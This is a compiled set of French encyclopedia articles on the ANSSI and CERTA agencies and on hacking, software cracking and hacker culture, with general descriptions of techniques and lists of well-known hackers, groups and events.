Agence nationale de la sécurité des systèmes d'information 338

Gouvernance La gouvernance de l'ANSSI est assurée par un Comité Stratégique[10] comprenant : • le secrétaire général de la défense et de la sécurité nationale qui en assure la présidence, • le chef d'état-major des armées ; • le secrétaire général du ministère de l'Intérieur, de l'Outre-mer et des Collectivités territoriales ; • le secrétaire général du ministère des affaires étrangères et européennes ; • le délégué général pour l'armement ; • le directeur général de la sécurité extérieure ; • le directeur général des systèmes d'information et de communication ; • le directeur général de la modernisation de l'État ; • le directeur central du renseignement intérieur ; • le vice-président du Conseil général de l'industrie, de l'énergie et des technologies ; •• le directeur général de l'Agence nationale de la sécurité des systèmes d'information.

Moyens D’après un rapport du sénat, même si d’importants efforts ont été mis en place ces dernières années, la situation de la France au regard de la menace provenant des attaques informatiques reste encore insatisfaisante. En effet, l’ANSSI ne dispose pas de moyens financiers et humains comparables à ses homologues américaines, britannique ou allemande[11].

Humains

Années Effectifs

2011 (création) 120

2011 170

2012 250

2013 360

Le 3 octobre 2012, lors des dernières Assises de la sécurité, le directeur général de l’ANSSI Patrick Pailloux, a annoncé une phase de recrutement de 80 personnes en 2013[12].

Financiers

Années Budget en millions d'euros

2009 45 M€

2012 75 M€

Notes et références

[1] http:/ / www. ssi. gouv. fr/

[2] http:/ / fr. wikipedia. org/ w/ index.

php?title=Agence_nationale_de_la_s%C3%A9curit%C3%A9_des_syst%C3%A8mes_d%27information& action=edit& section=0 [3][3][http://legifrance.gouv.fr/affichTexte.do?cidTexte=JORFTEXT000020828212 Décret 2009-834 du 7 juillet 2009

[4] N. G., « Naissance d'une agence nationale consacrée à la guerre informatique » (http:/ / www. lemonde. fr/ societe/ article/ 2009/ 07/ 09/

naissance-d-une-agence-nationale-consacree-a-la-guerre-informatique_1217128_3224. html#ens_id=1217205), Le Monde, daté du 9 juillet 2009, p. 12.

[5] Historique de l'ANSSI (http:/ / www. ssi. gouv. fr/ fr/ anssi/ presentation/ l-historique-de-l-anssi. html) Agence nationale de la sécurité des systèmes d'information 339

[6] Présentation de la sous-direction SDE sur le site de l'ANSSI ssi.gouv.fr (http:/ / www. ssi. gouv. fr/ fr/ anssi/ organisation/

sous-direction-expertise-sde. html)

[7] Présentation de la sous-direction SIS sur le site de l'ANSSI ssi.gouv.fr (http:/ / www. ssi. gouv. fr/ fr/ anssi/ organisation/

sous-direction-systemes-d-information-securises-sis. html)

[8] Présentation de la sous-direction RELEC sur le site de l'ANSSI ssi.gouv.fr (http:/ / www. ssi. gouv. fr/ fr/ anssi/ organisation/

sous-direction-relations-exterieures-et-coordination-relec. html)

[9] Présentation du CFSSI sur le site de l'ANSSI ssi.gouv.fr (http:/ / www. ssi. gouv. fr/ site_article69. html)

[10] Comité stratégique de la SSI sur le site de l'ANSSI ssi.gouv.fr (http:/ / www. ssi. gouv. fr/ site_article73. html)

[11] La cyberdéfense : un enjeu mondial, une priorité nationale (http:/ / www. senat. fr/ rap/ r11-681/ r11-68123. html) [12] Discours de Patrick Pailloux, directeur général de l’Agence nationale de la sécurité des systèmes d’information lors des Assises de la sécurité

2012 (http:/ / www. ssi. gouv. fr/ IMG/ pdf/ Discours_Patrick_Pailloux-_Assises_2012. pdf)

Annexes

Articles connexes • ENISA Agence européenne chargée de la sécurité des réseaux et de l'information • EC3 Centre européen de lutte contre la cybercriminalité

Liens externes

• Site officiel de l'ANSSI (http:/ / www. ssi. gouv. fr/ )

• Portail de la sécurité informatique • Portail de la politique française Centre d'expertise gouvernemental de réponse et de traitement des attaques informatiques

Cet article est une ébauche concernant la sécurité informatique et la France. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Le Centre d'expertise gouvernemental de réponse et de traitement des attaques informatiques (ou CERTA) est un organisme rattaché à l'Agence nationale de la sécurité des systèmes d'information, destiné à coordonner la lutte contre les intrusions dans les systèmes d'information des administrations de l'État français. Il a pour objectifs d'assurer la détection des vulnérabilités et la résolution d'incidents concernant la sécurité des systèmes d'information ainsi que l'aide à la mise en place de moyens permettant de se prémunir contre de futurs incidents au niveau interministériel. Il s'agit donc d'un élément d'une agence gouvernementale ne disposant d'aucune autorité judiciaire ; placé sous tutelle du Premier ministre, le CERTA peut néanmoins communiquer ses informations à d'autres services disposant de ce pouvoir (Gendarmerie notamment). Créé le 19 janvier 1999, le CERTA : • est membre du FIRST (Forum of incident reponse and security teams, une organisation spécialisée dans la diffusion rapide d'informations au sujet des incidents informatiques) depuis le 12 septembre 2000 • participe depuis le 25 mars 2002 à l'activité TF-CSIRT (Computer Security Incident Response Team), qui est l'organisme de coordination des CERTs au niveau européen. Centre d'expertise gouvernemental de réponse et de traitement des attaques informatiques 340

Notes et références 341

12-Culture informatique : hacker, cracker 342

12.1-Principes

Hacking

Dans un sens large, le hacking concerne les activités visant à détourner un objet de sa fonction première. Le hacking a pour fonction de résoudre ou d'aider à résoudre des problèmes, et cela dans de nombreux domaines. Le hacking, quand celui-ci s'apparente au piratage informatique[1] est une pratique visant à un échange « discret » d'informations illégales et/ou personnelles. Cette pratique établie par les hackers, portion de la population démocratisée en 1983 par le magazine Newsweek, émerge lorsque les premiers ordinateurs font leur apparition dans les foyers. Nombre de crackers ont commencé leur activité en essayant de casser les restrictions anti-copie ou en détournant les règles des jeux informatiques avant la généralisation d'Internet qui a alors ouvert de plus larges horizons à leur activité. En France, la communauté de hackers s'est plutôt détournée vers le logiciel libre lorsque les médias ont révélé au début des années 1990 que le Chaos Computer Club France était un faux-groupe de hackers qui travaillait en collaboration avec la gendarmerie[2], mais de nombreuses communautés indépendantes on vu le jour, et continuent à mettre à disposition leurs ressources, souvent sous forme de wiki ou de repository En 2009, le hacking regroupe un ensemble de techniques relevant des failles et vulnérabilités d'un élément ou d'un groupe d'éléments, matériel ou humain (social engineering). Les attaques informatiques à l'époque de Kevin Mitnick, Kevin Poulsen ou encore Jon Johansen (DVD Jon) étaient peu nombreuses comparées à celles lancées en 2009. De nos jours, la menace est moins virulente, mais beaucoup plus massive, notamment par l'augmentation croissante des « script kiddies » ou hacker néophytes.

Les hackers Derrière le terme hacker « se cachent des utilisateurs à part, qui préfèrent fouiller dans les entrailles d’un ordinateur plutôt que simplement l’utiliser »[3]. Les motivations principales du hacker sont « la passion, le jeu, le plaisir, l’échange et le partage »[4].

Pirate ou hacker De manière générale, les médias modernes semblent relier les hackers informatiques à des pirates informatiques, bien que la traduction de « pirate » ne correspond pas aux définitions de « fouineur » ou de « bidouilleur » que l'on peut trouver dans les institutions qui font référence en langue française[5]. Le hacking coexiste bien souvent avec la sécurité informatique, mais ces deux domaines ne sont pas à confondre. Cela n'empêche nullement que les hackers soient aussi des spécialistes en informatique. La différence notable entre ces deux pratiques sont que le hacker le fait, normalement, pour aider à "patcher" ces brèches et le pirate le fait dans le but d'exploiter cette dite faille. Article détaillé : Hacker (sécurité informatique).

Le Hacking moderne Le hacking place les hackers « au cœur du développement de nos sociétés », c'est-à-dire au cœur de l'information et du partage d’information. Cette place au centre du développement des sociétés est surtout due à la curiosité des hackers[6]. Les hackers utilisent les ressources des communautés de hackers à travers l'échange et le partage pour la résolution d'un problème, on perçoit ce comportement dans le logiciel libre. La résolution se fait souvent en un temps record, car elle se fait par passion, plaisir ou jeu. Hacking 343

Éthique L'éthique du hacker a été créée au MIT, et comprend six règles : •• L'accès aux ordinateurs - et à tout ce qui peut nous apprendre comment le monde marche vraiment - devrait être illimité et total. •• L'information devrait être libre et gratuite. •• Méfiez-vous de l'autorité. Encouragez la décentralisation. • Les hackers devraient être jugés selon leurs œuvres, et non selon des critères qu'ils jugent factices comme la position, l’âge, la nationalité ou les diplômes. •• On peut créer l'art et la beauté sur un ordinateur. •• Les ordinateurs sont faits pour changer la vie. « Il n’est pas nécessaire de lire Hackers, le livre de Steven Levy, pour réaliser que c'est l'esprit des années 1970 qui souffle dans ces principes. Au MIT, le besoin de libérer l'information répondait à un besoin pratique de partager le savoir pour améliorer les capacités de l'ordinateur. Aujourd'hui, dans un monde où la plupart des informations sont traitées par ordinateur, ce besoin est resté le même - mais il s'étend à tous ceux qui vivent sur cette planète et ont l'intention d'y faire quelque chose, plus seulement aux fondus de l’ordinateur ! »[7]. L'auteur de l'éthique du hack moderne invite à ne plus regarder le hacker comme étant uniquement « un étudiant imaginatif et audacieux » ou à « un spécialiste en informatique », mais à étendre cette vision du hacker à l'ensemble de la société et même à la « planète ». Il est rejoint dans son invitation par Le Mentor lorsqu'il dit à la fin de son manifeste « après tout, nous sommes tous pareils ». Selon eux, le hacking doit donc être envisagé dans une vision plus large, et non plus restreinte. Le hacking a pour fonction de résoudre ou d'aider à résoudre des problèmes, et cela dans de nombreux domaines[8]. Le hacking comporte plusieurs aspects qui sont l'extension de l'éthique créée au MIT : •L'aspect communautaire forme un des points forts du hacking. L'organisation en communauté permet l’extension du partage d’information, les communautés étant interconnectées la propagation de l'information est très rapide. L'organisation en communauté permet l’entraide entre personnes, mais également aux personnes de jeunes âges qui souhaitent apprendre. L'interconnexion de personnes, qui ne se connaissent pas, permet une aide qui place les individus au même plan, et cela sans jugement de valeur. Cet aspect pousse à la généralisation et au partage du savoir sans que cela se fasse sur la base de critères tels que « la position, l’âge, la nationalité ou les diplômes ». •L'underground dans le sens de communauté locale, c'est-à-dire la diffusion de l'information dans un cercle restreint de personnes, on retrouve ce comportement dans le partage de contenu jugé comme illégaux par les autorités, ou encore dans le partage de 0 day. En effet, l'un des aspects du hacking est ce qu'on peut appeler le Warez. Cette attitude ne fait que reprendre l'expression « L’information devrait être libre et gratuite » qui se retrouve également dans le réseau de partage P2P. La communauté locale deviendra globale au fur à mesure que la technologie avancera. •L'aspect social. La dynamique communautaire implique un échange constant d’informations entre les divers acteurs de la communauté. Cet échange demande parfois l’intervention du hacking, et n’est possible que si l’information à échanger inclut une clause de non divulgation. Ainsi le hacking peut forcer pacifiquement l’échange en usant du social engineering qui est la technique qui a le plus d'impact sur la communauté, car elle utilise la « faiblesse humaine »[9]. L’aspect social se base principalement sur l’échange d’information dans un milieu plus ou moins indépendant. •L'aspect technique. Le hacking regroupe un nombre important de techniques avec plus ou moins de succès, voici quelques-unes des techniques utilisées par les hackeurs : Social Engineering (Ingénierie sociale); Stacks Overflows et Heap Overflows (dépassement de tampon), écriture de shellcode; Exploitation des « format bugs »; Sniffing; Snarfing; Scanning; Spoofing; Hijacking; Fingerprinting; Détournement et utilisation de données WEB (Cookie, CSS, CGI, vulnérabilités concernant les langages PHP, ASP, SQL, etc.); Attaques réseaux qui regroupe Hacking 344

Déni de service distribué (DDoS), Attaque de l'homme du milieu (MITM), ARP Spoofing ou ARP Poisoning, Fragments attacks, Tiny Fragments, Fragment Overlapping, IP Spoofing, TCP Session Hijacking, DNS Spoofing, DNS ID Spoofing et DNS Cache Poisoning (empoisonnement du cache DNS)[10].

Hacktivisme « L'hacktivisme est une contraction de hacking et activisme ». Le fait de hacker et le hacker sont souvent confondus. Cependant, l'acte lui-même de hacker peut être perpétré par tout le monde, ou plutôt toutes personnes voulant un moyen de partager son avis politique. Le terme « hacking », qui est repris dans le monde « hacktivisme », n'est que la représentation que le geste de hacker, mais en aucun cas le personnage même du hacker. La conséquence la plus fâcheuse est que le hacker souffre de l'hacktivisme parce qu'il apporte auprès des médias une image qui n'est pas la sienne, car les médias confondent encore le fait de hacker et le personnage du hacker[6].

Publications en français • Hacker News Magazine, traduction de Hacker Journal (italien), édité par WLF Publishing SRL (Rome), bimestriel, 32 pages, 2 € (France) ; • Hackers Magazine, réalisé par une communauté, édité par WLF Publishing SRL (Rome), bimestriel, 32 pages + 1 CD, 4,99 € ; • Hakin9, publié par Software Sp. z o. o. SK, bimestriel, 84 pages + 1 CD, 7,5 € ; • HacKethic, publié par La Pieuvre Noire, trimestriel, 24 pages grand format • L'éthique hacker, traduction de The Hacker Ethic de Pekka Himanen.

Notes et références

[1] Grand Dictionnaire Terminologique (http:/ / gdt. oqlf. gouv. qc. ca/ ficheOqlf. aspx?Id_Fiche=2074397) [2] Jean Guisnel, « Une contre-histoire de l'Internet », Arte France, 2013, 15 min 30 sec

[3] http:/ / www. infos-du-net. com/ actualite/ dossiers/ 98-histoire-hacking. html

[4] La « hacker attitude », modèle social pour l'ère post-industrielle (http:/ / www. freescape. eu. org/ biblio/ article. php3?id_article=129) [5] "Hacking" peut se traduire par "bidouillage", alors qu'un "piratage" se dit "hijacking".

[6] ITSecurite - La sécurité technique et juridique des systèmes d'informations (http:/ / www. weka. fr/ informatique/ securite/ itsecurite/ actu/

mobilite/ 42818/ )

[7] [samizdat | biblioweb] L’éthique du hack moderne (http:/ / biblioweb. samizdat. net/ article39. html)

[8] L'Éthique hacker de (http:/ / www. freescape. eu. org/ biblio/ article. php3?id_article=114) Pekka Himanen

[9] Conseil, Intégration de systèmes & Infogérance - Teamlog.com (http:/ / www. securite. teamlog. com/ publication/ 6/ 10/ 216/ index. html) [10][10]Le nom en anglais a été gardée dans la plupart des cas pour éviter toute interprétation lors de la traduction en français.

Articles connexes •• Hack •• Hacker (sécurité informatique) •• Bidouillabilité •• Cyberterrorisme

• Portail de la sécurité de l’information Hack 345 Hack

Le hack est une manipulation d'un système, de l'anglais to hack, tailler, couper quelque chose à l'aide d'un outil. Par analogie, séparer des blocs logiques, retirer de l'étude tout ce qui n'est pas nécessaire, et regrouper des données dispersées permet de retrouver une cohérence, tout en permettant d'être mieux compris dans son fonctionnement. La légalité de ce « palier » du hack est sujette à débat, notamment par le statut indéfini de la légalité de certaines méthodes de lecture des données (notamment les Packet sniffers). Le terme de hack est très employé par les internautes et les médias d'information, mais dans des significations qui tendent vers un abus de langage. C'est pourquoi il est primordial de différencier l'étymologie de la méthode de hack des applications possibles, qui peuvent former alors des domaines plus spécifiques. Le terme le plus employé pour désigner quelqu'un utilisant cette méthode est hacker, toutefois, et pour éviter tout débat autour de l'emploi du terme, l'expression acteur du hack (quelqu'un se servant de la méthode de hack à différentes fins) sera utilisée dans cet article.

Les significations populaires de la méthode de hack

Le rapport à l'informatique En programmation, le hack est une solution rapide et bricolée pour contourner un problème, quel qu'il soit. Il peut s'agir d'une limitation du langage de programmation lui-même, ou d'une conception imparfaite de la part du programmeur. Dans ce cas, plutôt que de réécrire une grosse section du code source, le hacker peut choisir de le cracker, plus rapide à mettre en œuvre mais moins propre et pouvant mener à des problèmes ultérieurs. Cracker des logiciels sert également à enlever la protection de certains qui demandent une clé d'activation payante. Les crackers, après avoir « analysé » le logiciel en question, créent un autre logiciel appelé Keygen signifiant générateur de clé, qui génère des clés d'activations et/ou des numéros de séries, permettant ainsi de se servir du logiciel sans payer. Cette méthode est illégale et interdite en France et dans de très nombreux autres pays.

Le rapport à Internet La signification la plus usitée de l'application de la méthode de hack est la modification arbitraire et visible du contenu d'un site Internet - la page d'accueil la plupart du temps, en raison du fait que c'est la page la plus visitée sur un site. Les motivations des acteurs du hack sont diverses, on distingue les chapeaux blancs et les chapeaux noirs, mais il y en a principalement trois : 1. La preuve de la faiblesse (ou de l'efficacité) de la sécurité du site Internet. Les cibles préférées sont les sites les plus visités ou les plus symboliques. Les trois motivations principales sont le défi de la difficulté rencontrée durant l'action, un message à faire passer (ironique, la plupart du temps), et la recherche d'une renommée (bien que les acteurs du hack les plus talentueux sont toujours très modestes [réf. nécessaire]). 2.2.L'intention de nuire aux responsables du site Internet, et facultativement, de sa communauté et de ses lecteurs. Les raisons d'une telle envie de nuire sont principalement la vengeance ou le besoin de renommée, péjorative ou non. 3.3.L'intention de servir la Loi par des actions menées contre des sites et communautés illicites. Ces actions sont les moins citées des médias, et pourtant, moralement, ce sont les plus appréciées et soutenues. Mais attention en agissant contre un site illicite sans être coordonné par la police, c'est peut-être toute une filature, toute une enquête policière que l'on ralentit (voire saborde) et l'effet obtenu est alors exactement contraire à celui souhaité au départ. Cette application de l'acteur du hack a pour terme équivalent pirate informatique qui, lui aussi, amène beaucoup de débats. Hack 346

Le rapport aux réseaux Le terme de hack a alors pour définition l'action visant à pénétrer sans autorisation dans un réseau, câblé ou non. C'est surtout grâce à la démocratisation des réseaux sans fil que le terme de hack resurgit dans toute sa splendeur. Le principe est le même que pour une attaque d'un site Internet : accéder à un domaine privé sans autorisation, et être capable ou non de modifier tout contenu derrière cette barrière. La grande différence du hack d'un réseau sans fil est la popularisation des outils permettant une casse rapide et sans connaissance nécessaire de la sécurité du réseau. L'auteur de telles pratiques est alors considéré comme étant un script kiddie.

Le rapport aux logiciels : le domaine du crack Articles détaillés : Crack et Crack No-DVD. L'application du hack dans l'analyse de logiciels a amené la création et le développement du monde du cracking. Cette application consiste à analyser le fonctionnement d'une protection pour la contourner ou la leurrer. La différenciation entre hack et crack est beaucoup plus nette chez les internautes qu'il y a quelques années, où hack était LE mot passe-partout. Le Crack est une copie quasi-conforme du fichier exécutable original (fournit par le développeur du logiciel), sauf qu'un pirate en a supprimé des composants (pour éviter une détection de disque original par exemple). Le principe pour les contrevenants est simple, il suffit de remplacer le fichier exécutable original par celui piraté, et le logiciel pourra ensuite se lancer sans demander de clé d'activation ou vérifier la présence du disque dans le lecteur. Ce principe de contournement se généralise depuis plusieurs années, surtout dans le domaine des jeux vidéo, et pour les systèmes d'exploitation propriétaires.

Les améliorations du système par l'application de la méthode de hack L'application de la méthode de hack est à double tranchant : il est à la fois la preuve d'une faiblesse, d'une faille mais aussi le localisateur de cette faiblesse à combler et à protéger davantage. La place laissée aux systèmes informatique fait que suivant son importance, toute faiblesse permettrait une exploitation potentielle, et peut amener à la destruction des données, ce qui serait catastrophique à certaines échelles d'importance. C'est pourquoi de plus en plus de propriétaires de produits (sites Internet, logiciels...) invitent les acteurs du hack à trouver les faiblesses pouvant exister, et à faire en sorte que le créateur du produit puisse les corriger[1].

Articles connexes •• Hacking •• Hacker (sécurité informatique) •• Bidouillabilité

Références

[1] http:/ / labs. idefense. com/ vcp/ challenge. php Quarterly Vulnerabilities Challenge où le(s) gagnant(s) sont récompensés par une prime pouvant atteindre 12 000$

• Portail de l’informatique Crack (informatique) 347 Crack (informatique)

Pour les articles homonymes, voir Crack.

Cet article ou cette section doit être recyclé. Une réorganisation et une clarification du contenu sont nécessaires. Discutez des points à améliorer en page de discussion.

Cet article ne cite pas suffisamment ses sources (juin 2012). Si vous disposez d'ouvrages ou d'articles de référence ou si vous connaissez des sites web de qualité traitant du thème abordé ici, merci de compléter l'article en donnant les références utiles à sa vérifiabilité et en les liant à la section « Notes et références ». (Modifier l'article [1] )

Un crack (également appelé Cerise ou Fruit par les utilisateurs de NZB) est un programme qui s'applique sur un logiciel pour modifier son code, par exemple pour utiliser gratuitement un logiciel payant[2].

Terminologie Lorsque des personnes redistribuent les applications crackées, on parle alors de warez. Lorsqu'une personne a trouvé comment cracker un programme, elle peut créer un patch (un crack) qui permettra aux autres de déprotéger le programme sans avoir à en étudier la protection. Il ne faut pas confondre un crack avec un patch: •• Un patch est la modification d'une application (logiciel, jeux vidéo...) pour apporter un correctif, de nouvelles fonctionnalités, corriger un bug, modifier le fonctionnement d'une application. Le patch est, en général, fournit par le créateur du logiciel. •• Un crack est un type particulier de patch, car il n'émane pas de l'éditeur du logiciel et son application, n'est, dans la majorité des cas, pas autorisé par l'éditeur. Les cracks sont faits par des crackers. L'activité d'analyse et de modification est interdite dans la plupart des contrats de licences utilisateur des logiciels propriétaires.

Utilité • Pouvoir utiliser un logiciel protégé ou une fonction bridée sans posséder la licence correspondante •• Pouvoir utiliser un logiciel sans devoir utiliser le CD correspondant (crack « No CD ») • Permettre une interopérabilité, une amélioration ou une modification du fonctionnement d'un programme non prévue à l'origine par l'éditeur ou limité • Tricher dans un jeu vidéo • Éviter les problèmes d’interopérabilité avec les composants matériels et applicatifs de l'ordinateur (ex: le logiciel monopolise votre lecteur de cd ou refuse de s'installer car vous possédez légitimement un graveur et un logiciel de gravure) •• Relever un défi • Plus rarement, améliorer une application ou corriger un bogue lorsque l'éditeur ne fournit pas le patch correspondant Crack (informatique) 348

Outils du cracker • Le désassembleur permet d'interpréter le code compilé en code assembleur. • Le débogueur (debugger) permet de visualiser l'état du programme en cours d'exécution. •• Un éditeur hexadécimal permet de modifier le programme après l'avoir analysé avec le désassembleur. • Des programmes espions divers qui tracent les accès à la base de registre, aux appels systèmes, etc. • Un logiciel pour savoir si le programme à cracker est chiffré ou non

Méthodes du cracker Le but de crack est de contourner une limitation présente dans le logiciel, comme l'enregistrement avec une clé de sécurité, Pour y faire, on utilise la rétro-ingénierie. Le logiciel à cracker est désassemblé à l'aide d'un désassembleur, et le cracker essaye ensuite de trouver la fonction de protection. Dans la majorité des cas, il s'agit d'une fonction qui permet de vérifier si une clé donnée est valide ou non. Le but alors de cracking est de faire en sorte que la fonction valide toujours la clé entrée. Une fois la fonction est repérée, celle-ci est remplacé à l'aide d'un éditeur hexadécimal par l'instruction NOP qui veut dire No Opération (ne rien faire). Certains crackers préfèrent ne pas modifier le code de logiciel, et étudient la fonction de protection. Ils réalisent alors un générateur de clés valides. Les développeurs de logiciels propriétaire essayent de rendre ce processus difficile en utilisant l'obfuscation, chiffrement ou de faire de code automodifiable. Dans d'autres cas, le logiciel est décompilé pour avoir accès à son code source originale dans un langage de haut niveau. Ceci est possible avec les Langages de script ou les langages qui utilisent la compilation à la volée.

Protections à contourner Le cracker de logiciel est face à un objectif qui peut être : • Trouver un numéro de série pour enregistrer le programme • Trouver l'algorithme de génération des numéros de série pour enregistrer le programme à partir de n'importe quel nom par exemple. • Enlever les diverses protections du logiciel telles que : •• limitation du nombre d'utilisations •• limitation du temps d'utilisation •• limitation des fonctionnalités •• affichage de fenêtres inutiles intempestives • Modifier le programme pour qu'il convienne à son goût. Cela s'appelle du « reverse » (du terme anglais « reverse engineering ») et cela consiste à implémenter de nouvelles fonctionnalités au programme ou modifier son apparence ou son comportement. Pour arriver à ses fins, le cracker doit déjouer quelques embûches comme : • l'anti-débogage qui rend le débogueur inutilisable. • l'anti-désassemblage qui empêche le désassemblage. • le chiffrement ou la compression qui rendent le programme binaire illisible. • le code polymorphe ou l'obfuscation qui rend le débogage très pénible. Crack (informatique) 349

Musique et Collection Les Cracks possèdent souvent une musique électro 8-bit dans le style des musiques de gameboy, ces musiques sont appelées chiptunes. Une collection de cracks similaires s'appelle la Phonocrackophilie, ou tout simplement Crackophilie.

Notes et références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=Crack_(informatique)& action=edit

[2] Voir nom commun 2 (http:/ / fr. wiktionary. org/ wiki/ crack#fr-nom-1), sur le site fr.wiktionary.org

Articles connexes •• Cracker

• Portail de la sécurité informatique • Portail de la sécurité de l’information • Portail du droit 350

12.2-Acteurs

Hacker (sécurité informatique)

Cet article concerne le hacker en sécurité informatique. Pour les autres usages, voir Hacker.

Cet article ne cite pas suffisamment ses sources (juin 2008). Si vous disposez d'ouvrages ou d'articles de référence ou si vous connaissez des sites web de qualité traitant du thème abordé ici, merci de compléter l'article en donnant les références utiles à sa vérifiabilité et en les liant à la section « Notes et références ». (Modifier l'article [1] )

Un hacker est une personne qui montre une passion pour la compréhension du fonctionnement intime des systèmes, ordinateurs et réseaux informatiques en particulier[2]. En sécurité informatique, un hacker est un spécialiste dans la maîtrise de la sécurité informatique et donc des moyens de déjouer cette sécurité. Certains d'entre eux utilisent ce savoir-faire dans un cadre légal et d'autres l'utilisent hors-la-loi. Dans ce dernier cas, on parle de pirates informatiques[3]. Hacker, dans sa signification relayée par les médias de masse, se réfère aux chapeaux noirs (pirate informatique). Afin de lever l'ambiguïté sur le terme hacker, cracker est souvent utilisé pour désigner les black hats, le démarquant ainsi de la culture académique des hackers telle que définie par Eric Raymond[4].

Terminologie

Le jargon informatique classe les hackers en plusieurs catégories en fonction de leurs objectifs, de leur compétence et de la légalité de leurs actes. Ce vocabulaire fait référence aux films de western, où le héros porte un chapeau blanc, et les méchants portent des chapeaux noirs. Par respect nous utiliserons le terme cracker et non hacker pour désigner ces personnes. • Les chapeaux blancs ou white hat : professionnels de la sécurité informatique (consultants en sécurité, administrateurs réseaux...) effectuant des tests d'intrusions en accord avec leurs clients et la législation en vigueur afin de qualifier le niveau de sécurité de Le collectif Anonymous, un groupe de hackers. systèmes. Certains hackers se considèrent comme white hat alors qu'ils transgressent les lois, leur but étant de prévenir les responsables des failles de leurs systèmes. Certains d'entre eux s'infiltrent dans les systèmes de sécurités les plus coriaces juste pour la connaissance, pour se dire qu'ils savent le faire • Les chapeaux noirs ou black hat : créateurs de virus, cyber-espions, cyber-terroristes ou cyber-escrocs, agissant la plupart du temps hors-la-loi dans le but soit de nuire, de faire du profit ou d'obtenir des informations. Ces hackers n'ont pas la même éthique que les White hats et sont souvent malveillants. Les plus malveillants sont alors appelés crashers. • Les chapeaux gris ou grey hat : s'ils n'hésitent pas à pénétrer dans les systèmes sans y être autorisés, ils n'ont pas de mauvaises intentions. C'est souvent l'« exploit informatique » qui les motive, une façon de faire la preuve de leur agilité. Cette catégorie recouvre le large panel de personnes se situant entre le black hat et le white hat. Hacker (sécurité informatique) 351

• Les script kiddies ou lamer, littéralement « gamins qui utilisent des scripts » : sans grande compétence, ceux-ci piratent surtout par désir de se faire remarquer, en utilisant des programmes codés par d'autres. Ces personnes ne sont pas à proprement parler des hackers, mais elles se considèrent généralement comme tels. • Les hacktivistes : agissant afin de défendre une cause, ils n'hésitent pas à transgresser la loi pour attaquer des organisations afin de les paralyser ou d'obtenir des informations. Il serait réducteur de généraliser le cas et d'en déduire que les white hats sont les gentils et les black hats sont les méchants. En effet, de nombreux débats se font entre les deux camps et aucun camp n'a réussi à prouver que le sien était la voie à suivre. De nombreux white hats ne servent que leurs intérêts alors que d'autres black hats protègent ceux des autres. C'est d'ailleurs un sujet de troll récurrent.

Associations de hackers célèbres Les principaux groupes de hackers sont : • Chaos Computer Club (groupe allemand, le plus grand groupe de hackers européen, créé en 1981). Attention à ne pas confondre avec son homonyme français. • The Cult of the Dead Cow (créateur de Back Orifice 2000, un logiciel de prise de contrôle à distance) • 2600 (groupe hacker new-yorkais ; la fréquence du sifflet du Captain Crunch était de 2600 Hz) ; et la branche 2600 pour la France. • Hacking For Girliez (groupe de hackers féminins) ; responsable de nombreux piratages de sites comme ceux de la NASA, du New York Times ou de la firme Motorola.

Manifestations de hackers Depuis la fin des années 1980, certains groupes organisent des « manifestations » régulières, comme : • DEF CON : de nombreuses def cons ont été organisées depuis 1983 • Chaos Communication Congress (organisé par le Chaos Computer Club, tous les ans entre Noël et le jour de l'An) • Chaos Communication Camp (organisé par le Chaos Computer Club, tous les quatre ans, depuis 1999) •• Black Hat Briefings •• Hackers on Planet Earth •• ToorCon • Hackathon (organisé par le projet OpenBSD, tous les ans depuis 1999) • Nuit du Hack : de nombreuses nuit du hack ont été organisées en France depuis 2003 • Hacker Space Festival : en France D'autres rassemblements changent de nom à chaque fois, comme ceux organisés initialement par ce groupe [5] des Pays-Bas uni autour du magazine Hack-Tic [6] : • Galactic Hacker Party [7] en 1989 • Hacking at the End of the Universe [8] en 1993 • acking In Progress [9] en 1997 qui a rassemblé près de deux mille personnes • Hackers At Large en 2001 qui a rassemblé plus de trois mille personnes • What The Hack en 2005 qui a rassemblé plus de deux mille personnes Hacker (sécurité informatique) 352

Hackers célèbres • Daniel J. Bernstein : auteur de qmail et djbdns, également mathématicien et cryptographe. • Bill Landreth : auteur du best-seller Le Pirate de l'Informatique : Guide de la sécurité informatique en 1985. • Kevin Mitnick : s'infiltra dans certains des plus grands sites internet sécurisés, comme celui du Pentagone. • Islam Brahimi : connu pour avoir accédé illégalement à plusieurs ordinateurs reliés à Internet en créant l'un des plus grands réseaux Botnet de 500 000 ordinateurs infectés. • H.D Moore[10] : créateur de Metasploit •• Jon Ellch : plus connu sous le pseudonyme de Johnny Cash, il a particulièrement fait parler de lui en 2006 en démontrant avec son acolyte David Maynor l'existence de vulnérabilités dans les pilotes Wi-Fi, dont ceux d'Apple. •• Joanna Rutkowska : elle s'est fait connaitre de la communauté en 2006 grâce à la fameuse Blue Pill, un rootkit exploitant la technologie de virtualisation Pacifica d'AMD pour prendre le contrôle de Windows Vista. •• Gary McKinnon : accusé d'avoir pénétré dans 97 ordinateurs appartenant à l'US Army et à la NASA. •• Kevin Poulsen : connu sous le pseudonyme Dark Dante, il fut le premier hacker à être accusé d'espionnage aux États-Unis. • R1NZL3R : hacker d'Anonymous rejeté pour avoir trop fouiné. Désormais reconverti chez 2600 • Jon Lech Johansen : décryptage du contenu d'un DVD chiffré. • George Hotz : plus connu sous le pseudonyme de GeoHot, il a craqué l'iPhone (2007) et la PlayStation 3 (2010). • Julian Assange : ancien hacker, et principal porte-parole de WikiLeaks • Harald Welte : pour son travail d'ingénierie inverse sur le protocole et les équipements GSM • Karsten Nohl : pour son travail d'ingénierie inverse sur le chiffrement du protocole GSM et Mifare • Anonymous : groupe de personnes combattant pour la liberté d'internet, le partage… Ils sont contre la politique actuelle pour la plupart. Pour eux, elle n'a pas le droit de censurer quoi que ce soit sur internet, car il est fondé sur le partage et l'information. Ils ont déclaré une cyberguerre contre le gouvernement américain le 19 janvier dernier. Cette guerre est aussi appelée World War Web, à cause des origines diverses des milliers de hackers qui y participent (Corée, Japon, France, Canada, États-Unis…). Le nombre des membres d'anonymous (qui n'est pas formé que de hackers, mais aussi de manifestants par exemple) est estimé à quelques millions au total, mais ne cesse de s'accroître. Ils sont connus pour avoir piraté des sites comme celui de Sony, ou celui du FBI, du Palais de l'Élysée, ou même de la NASA. Ils ont mis au point dès leurs débuts un logiciel de DDoS appelé LOIC (Low Orbit Ion Canon), développé en C[réf. nécessaire]. (Il est à noter que les Anonymous ne sont pas une organisation structurée, mais plutôt une image donnée à (et que se donnent) un certain nombre de hackers[11].)

